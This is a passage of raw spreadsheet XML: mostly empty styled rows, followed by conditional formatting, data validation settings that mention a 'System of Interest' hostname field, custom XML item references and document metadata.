    <row r="396" spans="2:2">
      <c r="B396" s="129"/>
    </row>
    <row r="397" spans="2:2">
      <c r="B397" s="129"/>
    </row>
    <row r="398" spans="2:2">
      <c r="B398" s="129"/>
    </row>
    <row r="399" spans="2:2">
      <c r="B399" s="129"/>
    </row>
    <row r="400" spans="2:2">
      <c r="B400" s="129"/>
    </row>
    <row r="401" spans="2:2">
      <c r="B401" s="129"/>
    </row>
    <row r="402" spans="2:2">
      <c r="B402" s="129"/>
    </row>
    <row r="403" spans="2:2">
      <c r="B403" s="129"/>
    </row>
    <row r="404" spans="2:2">
      <c r="B404" s="129"/>
    </row>
    <row r="405" spans="2:2">
      <c r="B405" s="129"/>
    </row>
    <row r="406" spans="2:2">
      <c r="B406" s="129"/>
    </row>
    <row r="407" spans="2:2">
      <c r="B407" s="129"/>
    </row>
    <row r="408" spans="2:2">
      <c r="B408" s="129"/>
    </row>
    <row r="409" spans="2:2">
      <c r="B409" s="129"/>
    </row>
    <row r="410" spans="2:2">
      <c r="B410" s="129"/>
    </row>
    <row r="411" spans="2:2">
      <c r="B411" s="129"/>
    </row>
    <row r="412" spans="2:2">
      <c r="B412" s="129"/>
    </row>
    <row r="413" spans="2:2">
      <c r="B413" s="129"/>
    </row>
    <row r="414" spans="2:2">
      <c r="B414" s="129"/>
    </row>
    <row r="415" spans="2:2">
      <c r="B415" s="129"/>
    </row>
    <row r="416" spans="2:2">
      <c r="B416" s="129"/>
    </row>
    <row r="417" spans="2:2">
      <c r="B417" s="129"/>
    </row>
    <row r="418" spans="2:2">
      <c r="B418" s="129"/>
    </row>
    <row r="419" spans="2:2">
      <c r="B419" s="129"/>
    </row>
    <row r="420" spans="2:2">
      <c r="B420" s="129"/>
    </row>
    <row r="421" spans="2:2">
      <c r="B421" s="129"/>
    </row>
    <row r="422" spans="2:2">
      <c r="B422" s="129"/>
    </row>
    <row r="423" spans="2:2">
      <c r="B423" s="129"/>
    </row>
    <row r="424" spans="2:2">
      <c r="B424" s="129"/>
    </row>
    <row r="425" spans="2:2">
      <c r="B425" s="129"/>
    </row>
    <row r="426" spans="2:2">
      <c r="B426" s="129"/>
    </row>
    <row r="427" spans="2:2">
      <c r="B427" s="129"/>
    </row>
    <row r="428" spans="2:2">
      <c r="B428" s="129"/>
    </row>
    <row r="429" spans="2:2">
      <c r="B429" s="129"/>
    </row>
    <row r="430" spans="2:2">
      <c r="B430" s="129"/>
    </row>
    <row r="431" spans="2:2">
      <c r="B431" s="129"/>
    </row>
    <row r="432" spans="2:2">
      <c r="B432" s="129"/>
    </row>
    <row r="433" spans="2:2">
      <c r="B433" s="129"/>
    </row>
    <row r="434" spans="2:2">
      <c r="B434" s="129"/>
    </row>
    <row r="435" spans="2:2">
      <c r="B435" s="129"/>
    </row>
    <row r="436" spans="2:2">
      <c r="B436" s="129"/>
    </row>
    <row r="437" spans="2:2">
      <c r="B437" s="129"/>
    </row>
    <row r="438" spans="2:2">
      <c r="B438" s="129"/>
    </row>
    <row r="439" spans="2:2">
      <c r="B439" s="129"/>
    </row>
    <row r="440" spans="2:2">
      <c r="B440" s="129"/>
    </row>
    <row r="441" spans="2:2">
      <c r="B441" s="129"/>
    </row>
    <row r="442" spans="2:2">
      <c r="B442" s="129"/>
    </row>
    <row r="443" spans="2:2">
      <c r="B443" s="129"/>
    </row>
    <row r="444" spans="2:2">
      <c r="B444" s="129"/>
    </row>
    <row r="445" spans="2:2">
      <c r="B445" s="129"/>
    </row>
    <row r="446" spans="2:2">
      <c r="B446" s="129"/>
    </row>
    <row r="447" spans="2:2">
      <c r="B447" s="129"/>
    </row>
    <row r="448" spans="2:2">
      <c r="B448" s="129"/>
    </row>
    <row r="449" spans="2:2">
      <c r="B449" s="129"/>
    </row>
    <row r="450" spans="2:2">
      <c r="B450" s="129"/>
    </row>
    <row r="451" spans="2:2">
      <c r="B451" s="129"/>
    </row>
    <row r="452" spans="2:2">
      <c r="B452" s="129"/>
    </row>
    <row r="453" spans="2:2">
      <c r="B453" s="129"/>
    </row>
    <row r="454" spans="2:2">
      <c r="B454" s="129"/>
    </row>
    <row r="455" spans="2:2">
      <c r="B455" s="129"/>
    </row>
    <row r="456" spans="2:2">
      <c r="B456" s="129"/>
    </row>
    <row r="457" spans="2:2">
      <c r="B457" s="129"/>
    </row>
    <row r="458" spans="2:2">
      <c r="B458" s="129"/>
    </row>
    <row r="459" spans="2:2">
      <c r="B459" s="129"/>
    </row>
    <row r="460" spans="2:2">
      <c r="B460" s="129"/>
    </row>
    <row r="461" spans="2:2">
      <c r="B461" s="129"/>
    </row>
    <row r="462" spans="2:2">
      <c r="B462" s="129"/>
    </row>
    <row r="463" spans="2:2">
      <c r="B463" s="129"/>
    </row>
    <row r="464" spans="2:2">
      <c r="B464" s="129"/>
    </row>
    <row r="465" spans="2:2">
      <c r="B465" s="129"/>
    </row>
    <row r="466" spans="2:2">
      <c r="B466" s="129"/>
    </row>
    <row r="467" spans="2:2">
      <c r="B467" s="129"/>
    </row>
    <row r="468" spans="2:2">
      <c r="B468" s="129"/>
    </row>
    <row r="469" spans="2:2">
      <c r="B469" s="129"/>
    </row>
    <row r="470" spans="2:2">
      <c r="B470" s="129"/>
    </row>
    <row r="471" spans="2:2">
      <c r="B471" s="129"/>
    </row>
    <row r="472" spans="2:2">
      <c r="B472" s="129"/>
    </row>
    <row r="473" spans="2:2">
      <c r="B473" s="129"/>
    </row>
    <row r="474" spans="2:2">
      <c r="B474" s="129"/>
    </row>
    <row r="475" spans="2:2">
      <c r="B475" s="129"/>
    </row>
    <row r="476" spans="2:2">
      <c r="B476" s="129"/>
    </row>
    <row r="477" spans="2:2">
      <c r="B477" s="129"/>
    </row>
    <row r="478" spans="2:2">
      <c r="B478" s="129"/>
    </row>
    <row r="479" spans="2:2">
      <c r="B479" s="129"/>
    </row>
    <row r="480" spans="2:2">
      <c r="B480" s="129"/>
    </row>
    <row r="481" spans="2:2">
      <c r="B481" s="129"/>
    </row>
    <row r="482" spans="2:2">
      <c r="B482" s="129"/>
    </row>
    <row r="483" spans="2:2">
      <c r="B483" s="129"/>
    </row>
    <row r="484" spans="2:2">
      <c r="B484" s="129"/>
    </row>
    <row r="485" spans="2:2">
      <c r="B485" s="129"/>
    </row>
    <row r="486" spans="2:2">
      <c r="B486" s="129"/>
    </row>
    <row r="487" spans="2:2">
      <c r="B487" s="129"/>
    </row>
    <row r="488" spans="2:2">
      <c r="B488" s="129"/>
    </row>
    <row r="489" spans="2:2">
      <c r="B489" s="129"/>
    </row>
    <row r="490" spans="2:2">
      <c r="B490" s="129"/>
    </row>
    <row r="491" spans="2:2">
      <c r="B491" s="129"/>
    </row>
    <row r="492" spans="2:2">
      <c r="B492" s="129"/>
    </row>
    <row r="493" spans="2:2">
      <c r="B493" s="129"/>
    </row>
    <row r="494" spans="2:2">
      <c r="B494" s="129"/>
    </row>
    <row r="495" spans="2:2">
      <c r="B495" s="129"/>
    </row>
    <row r="496" spans="2:2">
      <c r="B496" s="129"/>
    </row>
    <row r="497" spans="2:2">
      <c r="B497" s="129"/>
    </row>
    <row r="498" spans="2:2">
      <c r="B498" s="129"/>
    </row>
    <row r="499" spans="2:2">
      <c r="B499" s="129"/>
    </row>
    <row r="500" spans="2:2">
      <c r="B500" s="129"/>
    </row>
    <row r="501" spans="2:2">
      <c r="B501" s="129"/>
    </row>
    <row r="502" spans="2:2">
      <c r="B502" s="129"/>
    </row>
    <row r="503" spans="2:2">
      <c r="B503" s="129"/>
    </row>
    <row r="504" spans="2:2">
      <c r="B504" s="129"/>
    </row>
    <row r="505" spans="2:2">
      <c r="B505" s="129"/>
    </row>
    <row r="506" spans="2:2">
      <c r="B506" s="129"/>
    </row>
    <row r="507" spans="2:2">
      <c r="B507" s="129"/>
    </row>
    <row r="508" spans="2:2">
      <c r="B508" s="129"/>
    </row>
    <row r="509" spans="2:2">
      <c r="B509" s="129"/>
    </row>
    <row r="510" spans="2:2">
      <c r="B510" s="129"/>
    </row>
    <row r="511" spans="2:2">
      <c r="B511" s="129"/>
    </row>
    <row r="512" spans="2:2">
      <c r="B512" s="129"/>
    </row>
    <row r="513" spans="2:2">
      <c r="B513" s="129"/>
    </row>
    <row r="514" spans="2:2">
      <c r="B514" s="129"/>
    </row>
    <row r="515" spans="2:2">
      <c r="B515" s="129"/>
    </row>
    <row r="516" spans="2:2">
      <c r="B516" s="129"/>
    </row>
    <row r="517" spans="2:2">
      <c r="B517" s="129"/>
    </row>
    <row r="518" spans="2:2">
      <c r="B518" s="129"/>
    </row>
    <row r="519" spans="2:2">
      <c r="B519" s="129"/>
    </row>
    <row r="520" spans="2:2">
      <c r="B520" s="129"/>
    </row>
    <row r="521" spans="2:2">
      <c r="B521" s="129"/>
    </row>
    <row r="522" spans="2:2">
      <c r="B522" s="129"/>
    </row>
    <row r="523" spans="2:2">
      <c r="B523" s="129"/>
    </row>
    <row r="524" spans="2:2">
      <c r="B524" s="129"/>
    </row>
    <row r="525" spans="2:2">
      <c r="B525" s="129"/>
    </row>
    <row r="526" spans="2:2">
      <c r="B526" s="129"/>
    </row>
    <row r="527" spans="2:2">
      <c r="B527" s="129"/>
    </row>
    <row r="528" spans="2:2">
      <c r="B528" s="129"/>
    </row>
    <row r="529" spans="2:2">
      <c r="B529" s="129"/>
    </row>
    <row r="530" spans="2:2">
      <c r="B530" s="129"/>
    </row>
    <row r="531" spans="2:2">
      <c r="B531" s="129"/>
    </row>
    <row r="532" spans="2:2">
      <c r="B532" s="129"/>
    </row>
    <row r="533" spans="2:2">
      <c r="B533" s="129"/>
    </row>
    <row r="534" spans="2:2">
      <c r="B534" s="129"/>
    </row>
    <row r="535" spans="2:2">
      <c r="B535" s="129"/>
    </row>
    <row r="536" spans="2:2">
      <c r="B536" s="129"/>
    </row>
    <row r="537" spans="2:2">
      <c r="B537" s="129"/>
    </row>
    <row r="538" spans="2:2">
      <c r="B538" s="129"/>
    </row>
    <row r="539" spans="2:2">
      <c r="B539" s="129"/>
    </row>
    <row r="540" spans="2:2">
      <c r="B540" s="129"/>
    </row>
    <row r="541" spans="2:2">
      <c r="B541" s="129"/>
    </row>
    <row r="542" spans="2:2">
      <c r="B542" s="129"/>
    </row>
    <row r="543" spans="2:2">
      <c r="B543" s="129"/>
    </row>
    <row r="544" spans="2:2">
      <c r="B544" s="129"/>
    </row>
    <row r="545" spans="2:2">
      <c r="B545" s="129"/>
    </row>
    <row r="546" spans="2:2">
      <c r="B546" s="129"/>
    </row>
    <row r="547" spans="2:2">
      <c r="B547" s="129"/>
    </row>
    <row r="548" spans="2:2">
      <c r="B548" s="129"/>
    </row>
    <row r="549" spans="2:2">
      <c r="B549" s="129"/>
    </row>
    <row r="550" spans="2:2">
      <c r="B550" s="129"/>
    </row>
    <row r="551" spans="2:2">
      <c r="B551" s="129"/>
    </row>
    <row r="552" spans="2:2">
      <c r="B552" s="129"/>
    </row>
    <row r="553" spans="2:2">
      <c r="B553" s="129"/>
    </row>
    <row r="554" spans="2:2">
      <c r="B554" s="129"/>
    </row>
    <row r="555" spans="2:2">
      <c r="B555" s="129"/>
    </row>
    <row r="556" spans="2:2">
      <c r="B556" s="129"/>
    </row>
    <row r="557" spans="2:2">
      <c r="B557" s="129"/>
    </row>
    <row r="558" spans="2:2">
      <c r="B558" s="129"/>
    </row>
    <row r="559" spans="2:2">
      <c r="B559" s="129"/>
    </row>
    <row r="560" spans="2:2">
      <c r="B560" s="129"/>
    </row>
    <row r="561" spans="2:2">
      <c r="B561" s="129"/>
    </row>
    <row r="562" spans="2:2">
      <c r="B562" s="129"/>
    </row>
    <row r="563" spans="2:2">
      <c r="B563" s="129"/>
    </row>
    <row r="564" spans="2:2">
      <c r="B564" s="129"/>
    </row>
    <row r="565" spans="2:2">
      <c r="B565" s="129"/>
    </row>
    <row r="566" spans="2:2">
      <c r="B566" s="129"/>
    </row>
    <row r="567" spans="2:2">
      <c r="B567" s="129"/>
    </row>
    <row r="568" spans="2:2">
      <c r="B568" s="129"/>
    </row>
    <row r="569" spans="2:2">
      <c r="B569" s="129"/>
    </row>
    <row r="570" spans="2:2">
      <c r="B570" s="129"/>
    </row>
    <row r="571" spans="2:2">
      <c r="B571" s="129"/>
    </row>
    <row r="572" spans="2:2">
      <c r="B572" s="129"/>
    </row>
    <row r="573" spans="2:2">
      <c r="B573" s="129"/>
    </row>
    <row r="574" spans="2:2">
      <c r="B574" s="129"/>
    </row>
    <row r="575" spans="2:2">
      <c r="B575" s="129"/>
    </row>
    <row r="576" spans="2:2">
      <c r="B576" s="129"/>
    </row>
    <row r="577" spans="2:2">
      <c r="B577" s="129"/>
    </row>
    <row r="578" spans="2:2">
      <c r="B578" s="129"/>
    </row>
    <row r="579" spans="2:2">
      <c r="B579" s="129"/>
    </row>
    <row r="580" spans="2:2">
      <c r="B580" s="129"/>
    </row>
    <row r="581" spans="2:2">
      <c r="B581" s="129"/>
    </row>
    <row r="582" spans="2:2">
      <c r="B582" s="129"/>
    </row>
    <row r="583" spans="2:2">
      <c r="B583" s="129"/>
    </row>
    <row r="584" spans="2:2">
      <c r="B584" s="129"/>
    </row>
    <row r="585" spans="2:2">
      <c r="B585" s="129"/>
    </row>
    <row r="586" spans="2:2">
      <c r="B586" s="129"/>
    </row>
    <row r="587" spans="2:2">
      <c r="B587" s="129"/>
    </row>
    <row r="588" spans="2:2">
      <c r="B588" s="129"/>
    </row>
    <row r="589" spans="2:2">
      <c r="B589" s="129"/>
    </row>
    <row r="590" spans="2:2">
      <c r="B590" s="129"/>
    </row>
    <row r="591" spans="2:2">
      <c r="B591" s="129"/>
    </row>
    <row r="592" spans="2:2">
      <c r="B592" s="129"/>
    </row>
    <row r="593" spans="2:2">
      <c r="B593" s="129"/>
    </row>
    <row r="594" spans="2:2">
      <c r="B594" s="129"/>
    </row>
    <row r="595" spans="2:2">
      <c r="B595" s="129"/>
    </row>
    <row r="596" spans="2:2">
      <c r="B596" s="129"/>
    </row>
    <row r="597" spans="2:2">
      <c r="B597" s="129"/>
    </row>
    <row r="598" spans="2:2">
      <c r="B598" s="129"/>
    </row>
    <row r="599" spans="2:2">
      <c r="B599" s="129"/>
    </row>
    <row r="600" spans="2:2">
      <c r="B600" s="129"/>
    </row>
    <row r="601" spans="2:2">
      <c r="B601" s="129"/>
    </row>
    <row r="602" spans="2:2">
      <c r="B602" s="129"/>
    </row>
    <row r="603" spans="2:2">
      <c r="B603" s="129"/>
    </row>
    <row r="604" spans="2:2">
      <c r="B604" s="129"/>
    </row>
    <row r="605" spans="2:2">
      <c r="B605" s="129"/>
    </row>
    <row r="606" spans="2:2">
      <c r="B606" s="129"/>
    </row>
    <row r="607" spans="2:2">
      <c r="B607" s="129"/>
    </row>
    <row r="608" spans="2:2">
      <c r="B608" s="129"/>
    </row>
    <row r="609" spans="2:2">
      <c r="B609" s="129"/>
    </row>
    <row r="610" spans="2:2">
      <c r="B610" s="129"/>
    </row>
    <row r="611" spans="2:2">
      <c r="B611" s="129"/>
    </row>
    <row r="612" spans="2:2">
      <c r="B612" s="129"/>
    </row>
    <row r="613" spans="2:2">
      <c r="B613" s="129"/>
    </row>
    <row r="614" spans="2:2">
      <c r="B614" s="129"/>
    </row>
    <row r="615" spans="2:2">
      <c r="B615" s="129"/>
    </row>
    <row r="616" spans="2:2">
      <c r="B616" s="129"/>
    </row>
    <row r="617" spans="2:2">
      <c r="B617" s="129"/>
    </row>
    <row r="618" spans="2:2">
      <c r="B618" s="129"/>
    </row>
    <row r="619" spans="2:2">
      <c r="B619" s="129"/>
    </row>
    <row r="620" spans="2:2">
      <c r="B620" s="129"/>
    </row>
    <row r="621" spans="2:2">
      <c r="B621" s="129"/>
    </row>
    <row r="622" spans="2:2">
      <c r="B622" s="129"/>
    </row>
    <row r="623" spans="2:2">
      <c r="B623" s="129"/>
    </row>
    <row r="624" spans="2:2">
      <c r="B624" s="129"/>
    </row>
    <row r="625" spans="2:2">
      <c r="B625" s="129"/>
    </row>
    <row r="626" spans="2:2">
      <c r="B626" s="129"/>
    </row>
    <row r="627" spans="2:2">
      <c r="B627" s="129"/>
    </row>
    <row r="628" spans="2:2">
      <c r="B628" s="129"/>
    </row>
    <row r="629" spans="2:2">
      <c r="B629" s="129"/>
    </row>
    <row r="630" spans="2:2">
      <c r="B630" s="129"/>
    </row>
    <row r="631" spans="2:2">
      <c r="B631" s="129"/>
    </row>
    <row r="632" spans="2:2">
      <c r="B632" s="129"/>
    </row>
    <row r="633" spans="2:2">
      <c r="B633" s="129"/>
    </row>
    <row r="634" spans="2:2">
      <c r="B634" s="129"/>
    </row>
    <row r="635" spans="2:2">
      <c r="B635" s="129"/>
    </row>
    <row r="636" spans="2:2">
      <c r="B636" s="129"/>
    </row>
    <row r="637" spans="2:2">
      <c r="B637" s="129"/>
    </row>
    <row r="638" spans="2:2">
      <c r="B638" s="129"/>
    </row>
    <row r="639" spans="2:2">
      <c r="B639" s="129"/>
    </row>
    <row r="640" spans="2:2">
      <c r="B640" s="129"/>
    </row>
    <row r="641" spans="2:2">
      <c r="B641" s="129"/>
    </row>
    <row r="642" spans="2:2">
      <c r="B642" s="129"/>
    </row>
    <row r="643" spans="2:2">
      <c r="B643" s="129"/>
    </row>
    <row r="644" spans="2:2">
      <c r="B644" s="129"/>
    </row>
    <row r="645" spans="2:2">
      <c r="B645" s="129"/>
    </row>
    <row r="646" spans="2:2">
      <c r="B646" s="129"/>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="C122:C135">
    <sortCondition ref="C122:C135"/>
  </sortState>
  <conditionalFormatting sqref="B159:B646">
    <cfRule type="expression" dxfId="2" priority="3">
      <formula>NOT(ISBLANK($C159))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A159">
    <cfRule type="expression" dxfId="1" priority="2">
      <formula>NOT(ISBLANK($C159))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A160:A1048576">
    <cfRule type="expression" dxfId="0" priority="1">
      <formula>NOT(ISBLANK($C160))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="L85" xr:uid="{DD3F1E2C-5392-405E-81A5-68ECCB9BA48E}">
      <formula1>C78:C93</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="D78" xr:uid="{2561D21F-76ED-4AF2-8367-5FFCDD42E274}">
      <formula1>C78:C93</formula1>
    </dataValidation>
    <dataValidation allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Auto-Generated Data" prompt="This cell is automatically populated from the 'Hostname' field in the 'System of Interest' sheet. Avoid overwriting manually to prevent discrepancies." sqref="C158" xr:uid="{2566D475-BFA6-47C5-A38B-F17D158FB6B6}"/>
  </dataValidation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A8364DB6-19CA-4EE4-A20B-890662FAD71D}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C28320E4-A5E8-4413-8E7C-6575F3EA0B19}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7E771B8D-CEAE-4922-886D-8795BD1CD55E}"/>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8184B909-2113-4DA5-8C78-ABBCEC4B61C3}"/>
</file>

<file path=customXml/itemProps5.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{946C86A5-6C4D-4B4B-B361-F13FFF0B570A}"/>
</file>

<file path=customXml/itemProps6.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7C74BD7F-8931-4DB2-B92D-09A96527C576}"/>
</file>

<file path=customXml/itemProps7.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BED69905-A430-43A2-96FB-2E339914079E}"/>
</file>

<file path=customXml/itemProps8.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7CCF0FA8-35CB-415D-AB21-1657868F48ED}"/>
</file>

<file path=customXml/itemProps9.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B0FD42A7-A5D2-4262-B545-72258151A117}"/>
</file>

<file path=customXml/itemProps10.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E600B982-8858-40DD-806C-2EB9AD2A1FF9}"/>
</file>

<file path=customXml/itemProps11.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{45B87042-DA18-44EF-9A2F-1746F9216BFF}"/>
</file>

<file path=customXml/itemProps12.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C64E1A48-AD7C-4176-AE71-94138E7DDE5F}"/>
</file>

<file path=customXml/itemProps13.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3E5B69E7-67A8-4AB0-B784-4B955375FEF5}"/>
</file>

<file path=customXml/itemProps14.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E9F0540-2D75-485B-8915-19293E81E7B1}"/>
</file>

<file path=customXml/itemProps15.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B97F1B30-054C-41A0-A88A-DFE742DA88AD}"/>
</file>

<file path=customXml/itemProps16.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D8BCDAB2-0D41-4CCF-9BB4-0AC7F09396EB}"/>
</file>

<file path=customXml/itemProps17.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0E0963AF-9D36-487F-9374-F38AAAD98893}"/>
</file>

<file path=customXml/itemProps18.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9EC5546A-8272-48C9-A63F-D9D2DF184FC8}"/>
</file>

<file path=customXml/itemProps19.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{69DF008E-22C6-4626-BE54-15F07EFB1762}"/>
</file>

<file path=customXml/itemProps20.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E3CA269C-B2E1-4F34-92A2-9253C56A387B}"/>
</file>

<file path=customXml/itemProps21.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{73268C95-CAF4-4DFA-AA19-9B17072B4DD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Bedang Sen</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-24T18:38:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-30T08:01:52Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>